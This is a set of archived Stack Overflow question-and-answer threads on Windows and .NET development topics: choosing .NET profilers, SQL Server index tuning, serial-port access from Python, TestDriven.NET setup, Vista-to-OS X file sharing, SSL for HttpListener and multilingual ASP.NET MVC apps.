A: I have used JetBrains dotTrace and Redgate ANTS extensively. They are fairly similar in features and price. They both offer useful performance profiling and quite basic memory profiling.
dotTrace integrates with Resharper, which is really convenient, as you can profile the performance of a unit test with one click from the IDE. However, dotTrace often seems to give spurious results (e.g. saying that a method took several years to run)
I prefer the way that ANTS presents the profiling results. It shows you the source code and to the left of each line tells you how long it took to run. dotTrace just has a tree view.
EQATEC profiler is quite basic and requires you to compile special instrumented versions of your assemblies which can then be run in the EQATEC profiler. It is, however, free.
Overall I prefer ANTS for performance profiling, although if you use Resharper then the integration of dotTrace is a killer feature and means it beats ANTS in usability.
The free Microsoft CLR Profiler (.Net framework 2.0 / .Net Framework 4.0) is all you need for .NET memory profiling.
2011 Update:
The Scitech memory profiler has quite a basic UI but lots of useful information, including some information on unmanaged memory which dotTrace and ANTS lack - you might find it useful if you are doing COM interop, but I have yet to find any profiler that makes COM memory issues easy to diagnose - you usually have to break out windbg.exe.
The ANTS profiler has come on in leaps and bounds in the last few years, and its memory profiler has some truly useful features which now pushed it ahead of dotTrace as a package in my estimation. I'm lucky enough to have licenses for both, but if you are going to buy one .Net profiler for both performance and memory, make it ANTS.
A: Don't forget nProf - a prefectly good, freeware profiler.
A: I've worked with RedGate's profiler in the past. Did the job for me.
A: Haven't tried it myself, but maybe dotTrace? Their ReSharper application is certainly a good one. Maybe dotTrace is too :)
A: I doubt that the profiler which comes with Visual Studio Team System is the best profiler, but I have found it to be good enough on many occasions. What specifically do you need beyond what VS offers?
EDIT: Unfortunately it is only available in VS Team System, but if you have access to that it is worth checking out.
A: The latest version of ANTS memory profiler (I think it's 5) simply rocks!!! I was haunting a leak using WinDbg and SOS since it proved to be the best way before, then I tried ANTS and I got it in minutes. Really a wonderful piece of software.
A: I would like to add yourkit java and .net profiler, I love it for Java, haven't tried .NET version though.
A: I have found dotTrace Profiler by JetBrains to be an excellent profiling tool for .NET and their ASP.NET mode is quality.
A: ANTS Profiler. I haven't used many, but I don't really have any complaints about ANTS. The visualization is really helpful.
A: AutomatedQA AQTime for timing and SciTech MemProfiler for memory.
A: If you're looking for something quick, easy, and free, http://code.google.com/p/slimtune/ seems to do the job fine.
A: Unfortunate most of the profilers I tried failed when used with tail calls, most notably ANTS. I just end up writing my own. There is a simple implementation on CodeProject that you can use as a base.
A: Intel® VTune™ Performance Analyzer for quick sampling
A: I must bring an amazing tool to your notice which i have used sometime back. AVICode Interceptor Studio. In my previous company we used this wonderful tool to profile the webapplication (This is supposed to be the single largest web application in the world and the largest civilian IT project ever done). The performance team did wonders with the help of this magnificent tool. It is a pain to configure it, but that is a one time activity and i would say it is worth the time. Checkout this page for details.
Thanks,
James
A: For me SpeedTrace is the best tool on the market because it does not only help you to find bottlenecks inside your applications. It also helps you in troubleshooting scenarios to find out why your application was crashing, your setup did not install, your application hung up, your application performance is sometimes poor depending on the data input, e.g. to identify slow db transactions.
A: The NuMega True Time profiler lives on in DevPartner Studio by Micro Focus. It provides line and method level detail for .NET apps requiring only PDBs, no source needed (but it helps.) It can discriminate between algorithmically heavy routines versus those with long I/O waits using our proprietary per thread kernel mode timing driver. Version 10.5 ships with new 64-process support on February 4, 2011. Shameless plug: I work on the DevPartner product line. Follow up at http://www.DevPartner.com for news of the 10.5 launch.
Disclaimer: I am the Product Manager for DevPartner at Micro Focus.
A: I've been testing Telerik's JustTrace recently and although it is well away from a finished product the guys are going in the right direction.
A: If Licensing is an issue you could try WINDBG for memory profiling
A: I've found plenty of problems in a big C# app using this.
Usually the problem occurs during startup or shutdown as plugins are being loaded, and big data structures are being created, destroyed, serialized, or deserialized. Often they are created and initialized more than once, and change handlers get added multiple times, further compounding the problem.
In cases like this, the program can be so sluggish that only 2 samples are sufficient to pinpoint the guilty method / function / property call sites.
A: We selected YourKit Profiler for .NET in my company as it was the best value (price vs. feature). For a small company that wants to have flexible licensing (floating licenses) it was a perfect choice - ANTS was developer seat locket at the time.
Also, it provided us with the ability to attach to the running process which was not possible with dotTrace. Beware though that attaching is not the best option as everything .NET will slow down, but this was the only way to profile .NET applications started by other processes.
Feature wise, ANTS and dotTrace were better - but in the end YourKit was good enough.
A: If you're on ASP.NET MVC, you can try MVCMiniProfiler (http://benjii.me/2011/07/using-the-mvc-mini-profiler-with-entity-framework/)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3927",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "373"
} |
Q: What's the best way to find long-running code in a Windows Forms Application I inherited a Windows Forms app written in VB.Net. Certain parts of the app run dreadfully slow. What's the easiest way to find which parts of the code are holding things up? I'm looking for a way to quickly find the slowest subroutines and tackle them first in an attempt to speed up the app.
I know that there are several code profiler products available for purchase which will show how long each subroutine takes, but I was hoping to find a free solution.
A: I appreciate the desire to find free software. However, in this case, I would strongly recommend looking at all options, including commercial products. I tried to play with nProf (which is at version 0.1 I think) and didn't have much luck. Even so, performance profiling an application is a subtle business and is best approached using a powerful, flexible tool. Unless you are working for free, I strongly believe the time you will save using a professional product will far outweigh the cost of a license. And of course, if you are only wanting to profile a single application, each commercial package has a 15 or 30 day trial, more than enough time to pinpoint any issues in an existing application. And if you need profiling support for more than just the one-off project, you're better buying a full strength tool anyway.
We use the ANTS profiler from RedGate and have been very happy with it. I have also used .NET Memory Profiler with excellent results. The cool thing about .NET Memory Profiler is that it can attach to and profile running production applications, which really saved our butts when we had a memory leak in production we couldn't reproduce in our test lab.
The JetBrains folks have a profiler as well called dotTrace which I haven't tried, but I have to believe that if it comes from the JetBrains shop it is probably top notch as well.
Anyway, my advice is this: try to fix your app within the free trial window of one or an aggregated combination of the three of them (minimum of 45 days free use) and if that isn't enough time, pick your favorite and spring for one of them. You won't be sorry.
A: nProf is a free .Net profiler (ref).
A: nProf is a good, free tool for .Net Profiling.
A: Visual Studio also comes with a performance profiler which is pretty good. it doesn't come with all versions - for VS2008, I think it is the Developer Edition you need.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3942",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: How do I know which SQL Server 2005 index recommendations to implement, if any? We're in the process of upgrading one of our SQL Server instances from 2000 to 2005. I installed the performance dashboard (http://www.microsoft.com/downloads/details.aspx?FamilyId=1d3a4a0d-7e0c-4730-8204-e419218c1efc&displaylang=en) for access to some high level reporting. One of the reports shows missing (recommended) indexes. I think it's based on some system view that is maintained by the query optimizer.
My question is what is the best way to determine when to take an index recommendation. I know that it doesn't make sense to apply all of the optimizer's suggestions. I see a lot of advice that basically says to try the index and to keep it if performance improves and to drop it if performances degrades or stays the same. I wondering if there is a better way to make the decision and what best practices exist on this subject.
A: First thing to be aware of:
When you upgrade from 2000 to 2005 (by using detach and attach) make sure that you:
*
*Set compability to 90
*Rebuild the indexes
*Run update statistics with full scan
If you don't do this you will get suboptimal plans.
IF the table is mostly write you want as few indexes as possible
IF the table is used for a lot of read queries you have to make sure that the WHERE clause is covered by indexes.
A: The advice you got is right. Try them all, one by one.
There is NO substitute for testing when it comes to performance. Unless you prove it, you haven't done anything.
A: Your best researching the most common type of queries that happen on your database and creating indexes based on that research.
For example, if there is a table which stores website hits, which is written to very very often but hardly even read from. Then don't index the table in away.
If how ever you have a list of users which is access more often than is written to, then I would firstly create a clustered index on the column that is access the most, usually the primary key. I would then create an index on commonly search columns, and those which are use in order by clauses.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3975",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: Programmatically talking to a Serial Port in OS X or Linux I have a Prolite LED sign that I like to set up to show scrolling search queries from a apache logs and other fun statistics. The problem is, my G5 does not have a serial port, so I have to use a usb to serial dongle. It shows up as /dev/cu.usbserial and /dev/tty.usbserial .
When i do this everything seems to be hunky-dory:
stty -f /dev/cu.usbserial
speed 9600 baud;
lflags: -icanon -isig -iexten -echo
iflags: -icrnl -ixon -ixany -imaxbel -brkint
oflags: -opost -onlcr -oxtabs
cflags: cs8 -parenb
Everything also works when I use the serial port tool to talk to it.
If I run this piece of code while the above mentioned serial port tool, everthing also works. But as soon as I disconnect the tool the connection gets lost.
#!/usr/bin/python
import serial
ser = serial.Serial('/dev/cu.usbserial', 9600, timeout=10)
ser.write("<ID01><PA> \r\n")
read_chars = ser.read(20)
print read_chars
ser.close()
So the question is, what magicks do I need to perform to start talking to the serial port without the serial port tool? Is that a permissions problem? Also, what's the difference between /dev/cu.usbserial and /dev/tty.usbserial?
Nope, no serial numbers. The thing is, the problem persists even with sudo-running the python script, and the only thing that makes it go through if I open the connection in the gui tool that I mentioned.
A: /dev/cu.xxxxx is the "callout" device, it's what you use when you establish a connection to the serial device and start talking to it. /dev/tty.xxxxx is the "dialin" device, used for monitoring a port for incoming calls for e.g. a fax listener.
A: have you tried watching the traffic between the GUI and the serial port to see if there is some kind of special command being sent across? Also just curious, Python is sending ASCII and not UTF-8 or something else right? The reason I ask is because I noticed your quote changes for the strings and in some languages that actually is the difference between ASCII and UTF-8.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3976",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "20"
} |
Q: Multi-Paradigm Languages In a language such as (since I'm working in it now) PHP, which supports procedural and object-oriented paradigms.
Is there a good rule of thumb for determining which paradigm best suits a new project? If not, how can you make the decision?
A: If you're doing something for yourself, or if you're doing just a prototype, or testing an idea... use the free style that script languages gives you.
After that: always think in objects, try to organize your work around the OO paradigm even if you're writing procedural stuff. Then, refactorize, refactorize, refactorize.
A: It all depends on the problem you're trying to solve. Obviously you can solve any problem in either style (procedural or OO), but you usually can figure out in the planning stages before you start writing code which style suits you better.
Some people like to write up use cases and if they see a lot of the same nouns showing up over and over again (e.g., a person withdraws money from the bank), then they go the OO route and use the nouns as their objects. Conversely, if you don't see a lot of nouns and there's really more verbs going on, then procedural or functional may be the way to go.
Steve Yegge has a great but long post as usual that touches on this from a different perspective that you may find helpful as well.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3978",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: TestDriven.NET is not running my SetUp methods for MbUnit I've created some MbUnit Test Fixtures that have SetUp methods marked with the SetUp attribute. These methods run before the tests just fine using the MbUnit GUI, the console runner, and the ReSharper MbUnit plugin. However, when I run the tests with TestDriven.NET it does not run the SetUp methods at all.
Does anyone know if this is a bug with TestDriven.NET or if I have something setup wrong?
A: No longer an issue with recent versions of Gallio since v3.0.4. Just make sure to use the 64-bit installer.
A: After having this problem for weeks on Vista 64, I found a post by Dave Bouwman just today, and it fixed this problem.
A: I had this exact same issue after installing NUnit using nuget ... previously I had been using an older version of NUnit and everything had worked fine.
I think TestDriven is not compatible with the latest version of NUnit.
I've switched to using NCrunch, which is free, and compiles/runs tests in the backgound as you are coding, amongst other things. Highly recommended.
A: I came across a similar issue with NUnit and TestDriven.NET that took me hours to figure out.
I installed the Visual Studio Extension below and it hit breakpoint in the Tests but skipped the one in the one in the [TestFixtureSetUp].
It turned out that I also needed the actual TestDriven.NET software to be installed at C:\Program Files (x86)\TestDriven.NET 4
This is available from https://www.testdriven.net/download.aspx
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3984",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: How do I configure a Vista Ultimate (64bit) account so it can access a SMB share on OSX? I have Windows File sharing enabled on an OS X 10.4 computer. It's accessible via \rudy\myshare for all the Windows users on the network, except for one guy running Vista Ultimate 64-bit edition.
All the other users are running Vista or XP, all 32-bit. All the workgroup information is the same, all login with the same username/password.
The Vista 64 guy can see the Mac on the network, but his login is rejected every time.
Now, I imagine that Vista Ultimate is has something configured differently to the Business version and XP but I don't really know where to look. Any ideas?
A: Try changing the local security policy on that Vista box for "Local Policies\Security Options\Network Security: LAN manager authentication level" from “Send NTLMv2 response only” to “Send LM & NTLM - use NTLMv2 session security if negotiated”.
A: No I have successfully done this with my Vista 64-bit machine. You may want to try using the IP Address of the machine and try connecting that way. Or maybe check out the log files on the Mac to see what the rejection error was.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3996",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: How do I add SSL to a .net application that uses httplistener - it will *not* be running on IIS Most recent edits in bold
I am using the .net HttpListener class, but I won't be running this application on IIS and am not using ASP.net. This web site describes what code to actually use to implement SSL with asp.net and this site describes how to set up the certificates (although I'm not sure if it works only for IIS or not).
The class documentation describes various types of authentication (basic, digest, Windows, etc.) --- none of them refer to SSL. It does say that if HTTPS is used, you will need to set a server certificate. Is this going to be a one line property setting and HttpListener figures out the rest?
In short, I need to know how to set up the certificates and how to modify the code to implement SSL.
Although it doesn't occur when I'm trying to access HTTPS, I did notice an error in my System Event log - the source is "Schannel" and the content of the message is:
A fatal error occurred when attempting
to access the SSL server credential
private key. The error code returned
from the cryptographic module is
0x80090016.
Edit:
Steps taken so far
*
*Created a working HTTPListener in C# that works for HTTP connections (e.g. "http://localhost:8089/foldername/"
*Created a certificate using makecert.exe
*Added the certificate to be trusted using certmgr.exe
*Used Httpcfg.exe to listen for SSL connections on a test port (e.g. 8090)
*Added port 8080 to the HTTPListener via listener.Prefixes.Add(https://localhost:8090/foldername/");
*tested an HTTP client connection, e.g. (http://localhost:8089/foldername/") in a browser and receive correct return
*tested an HTTPS client connection, e.g. (http://localhost:8090/foldername/") in a browser and receive "Data Transfer Interrupted" (in Firefox)
*debugging in visual studio shows that the listener callback that receives the requests never gets hit when the HTTPS connection starts - I don't see any place that I could set a breakpoint to catch anything else earlier.
*netstat shows that listening ports are open for both HTTPS and HTTP. the HTTPS port does go to TIME_WAIT after a connection is attempted.
*Fiddler and HTTPAnalyzer don't catch any of the traffic, I guess it doesn't get far enough in the process to show up in those HTTP analysis tools
Questions
*
*What could the problem be?
*Is there a piece of .Net code I am missing (meaning I have to do more in C# other than simply add a prefix to the listener that points to HTTPS, which is what i have done)
*Have a missed a configuration step somewhere?
*What else might I do to analyze the problem?
*Is the error message in the System Event log a sign of the problem? If so how would it be fixed?
A: You just have to bind a certificate to an ip:port and then open your listener with an https:// prefix. 0.0.0.0 applies to all ip's. appid is any random GUID, and certhash is the hash of the certificate (sometimes called a thumprint).
Run the following with cmd.exe using administrator privileges.
netsh http add sslcert ipport=0.0.0.0:1234 certhash=613bb67c4acaab06def391680505bae2ced4053b appid={86476d42-f4f3-48f5-9367-ff60f2ed2cdc}
If you want to create a self-signed certificate to test this,
*
*Open IIS
*Click on your computer name
*Click Server Certificates icon
*Click generate Self-Signed certificate
*Double click and go to details
*You will see the thumbprint there, just remove the spaces.
HttpListener listener = new HttpListener();
listener.Prefixes.Add("https://+:1234/");
listener.Start();
Console.WriteLine("Listening...");
HttpListenerContext context = listener.GetContext();
using (Stream stream = context.Response.OutputStream)
using (StreamWriter writer = new StreamWriter(stream))
writer.Write("hello, https world");
Console.ReadLine();
After running this program I just navigated to https://localhost:1234 to see the text printed. Since the certificate CN does not match the url and it is not in the Trusted Certificate store you will get a Certificate Warning. The text is encrypted however as you can verify with a tool like Wire Shark.
If you want more control over creating a self-signed x509 certificate openssl is a great tool and there is a port for windows. I've had a lot more success with it than the makecert tool.
It's also very important that to if you are communicating with an https service from code that has an ssl warning, you must setup the certificate validator on the service point manager to bypass it for testing purposes.
ServicePointManager.ServerCertificateValidationCallback += (sender, cert, chain, errors) => true;
A: I don't have it entirely implemented yet, but this web site seems to give a good walkthrough of setting up the certificates and the code.
A: Here is an alternative way to bind the SSL certifiate to the IP/PORT combination without using httpcfg.exe (XP) or netsh.exe (Vista+).
http://dotnetcodebox.blogspot.com.au/2012/01/how-to-work-with-ssl-certificate.html
The gist of it is that you can use a C++ HttpSetServiceConfiguration API in-built into windows to do it programatically rather than via the command line, hence removing dependency on the OS and having httpcfg installed.
A: The class documentation
has this note:
If you create an HttpListener using
https, you must select a Server
Certificate for that listener.
Otherwise, an HttpWebRequest query of
this HttpListener will fail with an
unexpected close of the connection.
and this:
You can configure Server Certificates
and other listener options by using
HttpCfg.exe. See
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/http/http/httpcfg_exe.asp
for more details. The executable is
shipped with Windows Server 2003, or
can be built from source code
available in the Platform SDK.
Is the first note explained by the second? As outlined in the question, I used httpcfg.exe to bind the certificate to a specific port. If they intend something other than this, the note is ambiguous.
A: I've encountered the same issue as you. Fortunately after googling hard steps on this page make SSL working with my HttpListener.
A: I have a similar problem, and it seems that there could be a problem with certificate itself.
Here's the path that worked for me:
makecert.exe -r -a sha1 -n CN=localhost -sky exchange -pe -b 01/01/2000 -e 01/01/2050 -ss my -sr localmachine
then look up certificate thumbprint, copy it to the clipboard and remove spaces. This will be a parameter after -h in the next command:
HttpCfg.exe set ssl -i 0.0.0.0:801 -h 35c65fd4853f49552471d2226e03dd10b7a11755
then run a service host on https://localhost:801/ and it works perfectly.
what I cannot make work is for https to run on self-generated certificate. Here's the code I run to generate one (error handling taken out for clarity):
LPCTSTR pszX500 = subject;
DWORD cbEncoded = 0;
CertStrToName(X509_ASN_ENCODING, pszX500, CERT_X500_NAME_STR, NULL, pbEncoded, &cbEncoded, NULL);
pbEncoded = (BYTE *)malloc(cbEncoded);
CertStrToName(X509_ASN_ENCODING, pszX500, CERT_X500_NAME_STR, NULL, pbEncoded, &cbEncoded, NULL);
// Prepare certificate Subject for self-signed certificate
CERT_NAME_BLOB SubjectIssuerBlob;
memset(&SubjectIssuerBlob, 0, sizeof(SubjectIssuerBlob));
SubjectIssuerBlob.cbData = cbEncoded;
SubjectIssuerBlob.pbData = pbEncoded;
// Prepare key provider structure for self-signed certificate
CRYPT_KEY_PROV_INFO KeyProvInfo;
memset(&KeyProvInfo, 0, sizeof(KeyProvInfo));
KeyProvInfo.pwszContainerName = _T("my-container");
KeyProvInfo.pwszProvName = NULL;
KeyProvInfo.dwProvType = PROV_RSA_FULL;
KeyProvInfo.dwFlags = CRYPT_MACHINE_KEYSET;
KeyProvInfo.cProvParam = 0;
KeyProvInfo.rgProvParam = NULL;
KeyProvInfo.dwKeySpec = AT_SIGNATURE;
// Prepare algorithm structure for self-signed certificate
CRYPT_ALGORITHM_IDENTIFIER SignatureAlgorithm;
memset(&SignatureAlgorithm, 0, sizeof(SignatureAlgorithm));
SignatureAlgorithm.pszObjId = szOID_RSA_SHA1RSA;
// Prepare Expiration date for self-signed certificate
SYSTEMTIME EndTime;
GetSystemTime(&EndTime);
EndTime.wYear += 5;
// Create self-signed certificate
pCertContext = CertCreateSelfSignCertificate(NULL, &SubjectIssuerBlob, 0, &KeyProvInfo, &SignatureAlgorithm, 0, &EndTime, 0);
hStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, 0, CERT_SYSTEM_STORE_LOCAL_MACHINE, L"MY");
CertAddCertificateContextToStore(hStore, pCertContext, CERT_STORE_ADD_REPLACE_EXISTING, 0);
Certificate shows fine and it has a working private key, but https will timeout as if thumbprint was never registered. If anyone knows why - plz comment
EDIT1: After some playing around, I have found the initialization for CertCreateSelfSignCertificate which generates proper certificate:
CRYPT_KEY_PROV_INFO KeyProvInfo;
memset(&KeyProvInfo, 0, sizeof(KeyProvInfo));
KeyProvInfo.pwszContainerName = _T("my-container");
KeyProvInfo.pwszProvName = _T("Microsoft RSA SChannel Cryptographic Provider");
KeyProvInfo.dwProvType = PROV_RSA_SCHANNEL;
KeyProvInfo.dwFlags = CRYPT_MACHINE_KEYSET;
KeyProvInfo.cProvParam = 0;
KeyProvInfo.rgProvParam = NULL;
KeyProvInfo.dwKeySpec = AT_KEYEXCHANGE;
| {
"language": "en",
"url": "https://stackoverflow.com/questions/4004",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "43"
} |
Q: Multiple languages in an ASP.NET MVC application? What is the best way to support multiple languages for the interface in an ASP.NET MVC application? I've seen people use resource files for other applications. Is this still the best way?
A: If you're using the default view engines, then local resources work in the views. However, if you need to grab resource strings within a controller action, you can't get local resources, and have to use global resources.
This makes sense when you think about it because local resources are local to an aspx page and in the controller, you haven't even selected your view.
A: Yes resources are still the best way to support multiple languages in the .NET environment. Because they are easy to reference and even easier to add new languages.
Site.resx
Site.en.resx
Site.en-US.resx
Site.fr.resx
etc...
So you are right still use the resource files.
A: I found this resource to be very helpful
Its a wrapper round the HttpContext.Current.GetGlobalResourceString and HttpContext.Current.GetLocalResourceString that allows you to call the resources like this...
// default global resource
Html.Resource("GlobalResource, ResourceName")
// global resource with optional arguments for formatting
Html.Resource("GlobalResource, ResourceName", "foo", "bar")
// default local resource
Html.Resource("ResourceName")
// local resource with optional arguments for formatting
Html.Resource("ResourceName", "foo", "bar")
The only problem I found is that controllers don't have access to local resouce strings.
A: The Orchard project uses a shortcut method called "T" to do all in-page string translations. So you'll see tags with a @T("A String to Translate").
I intend to look at how this is implemented behind the scenes and potentially use it in future projects. The short name keeps the code cleaner since it will be used a lot.
What I like about this approach is the original string (english, in this case) is still easily visible in the code, and doesnt require a lookup in a resource tool or some other location to decode what the actual string should be here.
See http://orchardproject.net for more info.
A: Some of the other solutions mentioned as answer do not work for the released version of MVC (they worked with previous versions of alpha/beta).
Here is a good article describing a way to implement localization that will be strongly-typed and will not break the unit testing of controllers and views: localization guide for MVC v1
A: This is another option, and you'll have access to the CurrentUICulture in the controller:
Check MVC3-multi-language
| {
"language": "en",
"url": "https://stackoverflow.com/questions/4034",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "70"
} |